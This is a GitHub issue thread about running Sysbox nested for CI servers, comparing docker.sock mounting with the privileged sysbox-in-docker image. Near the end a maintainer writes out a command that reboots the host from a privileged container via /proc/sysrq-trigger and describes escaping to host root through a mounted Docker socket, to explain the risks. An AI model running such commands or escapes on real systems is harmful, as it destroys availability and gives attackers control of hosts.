sysbox
sysbox copied to clipboard
Sysbox Nesting (future support?)
I understand that sysbox nesting is currently a limitation.
Is this a feature that is ever planned on being supported in the future?
I'm aware of some solutions like this Y Combinator comment. However, this comes with it's drawbacks as mentioned in the well known "Using Docker-in-Docker for your CI or testing environment? Think twice." blog post.
I can see this being a common use case such as for a CI server:
- You run your CI server in a docker container.
- Each build job runs inside a container
- The build jobs would like to do things like build, publish, etc.
For this case, 3 levels deep may be adequate, but I'm sure there are less common but valid use cases which would involve many more levels of nesting.
Thanks @ScottG489 for filing the issue.
I think I see your point here:
-
The CI server would run in a container deployed with Docker + Sysbox. This way the CI server can have a dedicated docker daemon yet be well isolated from the underlying host.
-
Inside that CI server, the jobs would run in containers. But some of those jobs may in turn need a docker daemon (e.g., to build, publish, run containers), so you want docker-in-docker inside the CI server, but want to avoid using privileged containers. That is, inside the CI server container, you want Docker + Sysbox installed.
Makes sense, and this would imply Sysbox itself running inside a Sysbox container (nested) as you suggested.
We don't have a Sysbox nesting in the roadmap right now. It's certainly something we've thought about, but it's unlikely we will support this at any time in the near future.
I'll label this issue as an epic though so we can track it here and see if we get more requests for this functionality.
Thanks again!
Great! Thanks for the quick reply, @ctalledo.
I believe I've found a temporary workaround. For my particular use case at least.
I'm mounting docker.sock on outer-most container. Inside this I run the containers using the sysbox runtime. All of these sysbox containers seem to be sandboxed from the outermost container as well as the host. Which all makes sense.
Do you know any potential problems or vulnerabilities this could cause? From my initial tests everything looked good.
As a side note, I'm having trouble running sysbox inside AWS. None of the AMI's I've been able to find have the shiftfs module. Do you happen to have any info on this? I'm happy to create a separate issue for this as it's bit off topic.
I'm mounting docker.sock on outer-most container. Inside this I run the containers using the sysbox runtime. All of these sysbox containers seem to be sandboxed from the outermost container as well as the host. Which all makes sense.
Just to make sure I get the config you are describing, is the following correct?
- You have a host with Docker + Sysbox installed.
- You are deploying the CI server is a regular container and mounting the host's docker socket into it.
- The CI server is using the Docker + Sysbox on the host to deploy jobs.
- The jobs are running in Sysbox containers (which isolates them from the host properly and allows them to run inner docker containers as needed).
By the way, you may have seen these already, but we have a couple of blog posts describing different CI configs with GitLab + Sysbox and Jenkins + Sysbox that may be helpful (even if they don't apply in your particular case):
https://blog.nestybox.com/2020/10/21/gitlab-dind.html https://blog.nestybox.com/2019/09/29/jenkins.html
Regarding your first comment, yes that's all just about correct.
Just to make sure we're on the same page though, the jobs themselves are running from the CI container but since docker.sock is mounted on it from the host they essentially run on the host as you said.
I just took a look at the blog posts.
It looks like the solution in the Jenkins post would be suffering from the same problem I'm trying to solve. Although the outer-most container is running in sysbox (so it can't interfere with the host), it's mounting docker.sock on all of the nested "job" containers. This means that these separate jobs can actually interfere with each other since they're all using the same docker daemon. For instance one job could docker kill another. Correct me if I'm wrong.
Finished reading the gitlab post. It seems that this post calls attention to the problem I mentioned above:
But there is a drawback:
- For CI jobs that interact with Docker, the isolation boundary is at the system container level rather than at the job level. That is, such a CI job could easily gain control of the system container and thus compromise the GitLab runner environment, but not the underlying host.
In any case, my other problem still remains in that I'm having a hard time finding an AMI that has shiftfs so that I can use the sysbox runtime in EC2.
Just to make sure we're on the same page though, the jobs themselves are running from the CI container but since docker.sock is mounted on it from the host they essentially run on the host as you said.
Got it. I think your setup is fine, since Sysbox is giving you a strong isolation boundary between the CI jobs and the host.
In any case, my other problem still remains in that I'm having a hard time finding an AMI that has shiftfs so that I can use the sysbox runtime in EC2.
Let's move this thread to the sysbox discussion forum: https://github.com/nestybox/sysbox/discussions/121
@ctalledo I was perusing the Sysbox release notes (my favorite pastime) and I came across sysbox-in-docker.
I think I roughly get the idea, but was wondering if you could expand on how it relates to this issue a little. Does this functionality directly make progress on this issue?
At least compared to using the docker.sock volume mount method, in terms of isolation it seems like it has the benefit of not having access to the hosts docker daemon, but all the drawbacks of using --privileged along with whatever the implications are of the other required mounts (e.g. -v /var/tmp/sysbox-var-lib-docker:/var/lib/docker, etc).
Hi @ScottG489,
Does this functionality directly make progress on this issue?
Not really as it uses a privileged container and runs Sysbox inside. This issue calls for deploying a Sysbox container and running Sysbox inside, which is a significantly more difficult task (but one that we want to pursue in time).
Sysbox-in-Docker was meant to provide an easy way for folks to play around with Sysbox without having to install it on a host.
At least compared to using the docker.sock volume mount method, in terms of isolation it seems like it has the benefit of not having access to the hosts docker daemon, but all the drawbacks of using --privileged along with whatever the implications are of the other required mounts (e.g. -v /var/tmp/sysbox-var-lib-docker:/var/lib/docker, etc).
That's correct. The sysbox-in-docker image includes a Docker daemon in it, so no connection to the host Docker daemon is required. But it uses a privileged container, so it's not ideal.
Note however that inner containers launched with the inner Docker + Sysbox are strongly isolated: those use the Linux user-namespace plus all the other isolation features of Sysbox. Thus, you can run untrusted workloads inside the inner Sysbox containers, even if the outer container is privileged.
Finally, the Sysbox test framework uses the sysbox-in-docker approach (though with a dedicated test image), because it allows us to play with Sysbox easily without messing up the host.
Thanks for the explanation.
It would seem in both cases the inner containers would be strongly isolated since they're running with Sysbox, but it seems like the sysbox-in-docker is perhaps more isolated overall from the system because the host won't see any of the containers spun up. However, would you say the sysbox-in-docker approach is more of a security risk due to requiring --privileged (and other mounts) vs using docker.sock?
However, would you say the sysbox-in-docker approach is more of a security risk due to requiring --privileged (and other mounts) vs using docker.sock
I think both approaches (i.e., --privileged vs mounting the docker socket) are a strong security risk, because it's very easy for the container to break out and take control of the host.
In the case of --privileged, there are well known container escapes (you can Google them). You can even reboot the host from within the container via a simple write to echo 1 > /proc/sys/kernel/sysrq && echo b > /proc/sysrq-trigger.
In the case of mounting the host Docker socket into a container, the container can now use the host's Docker to deploy a privileged container that mounts the host's "/" into the container, and have root access to the entire host.
It goes without saying that one of the reasons we built Sysbox is to avoid both of these scenarios by enabling strongly secured (rootless) containers to run any type of software in them (including Docker).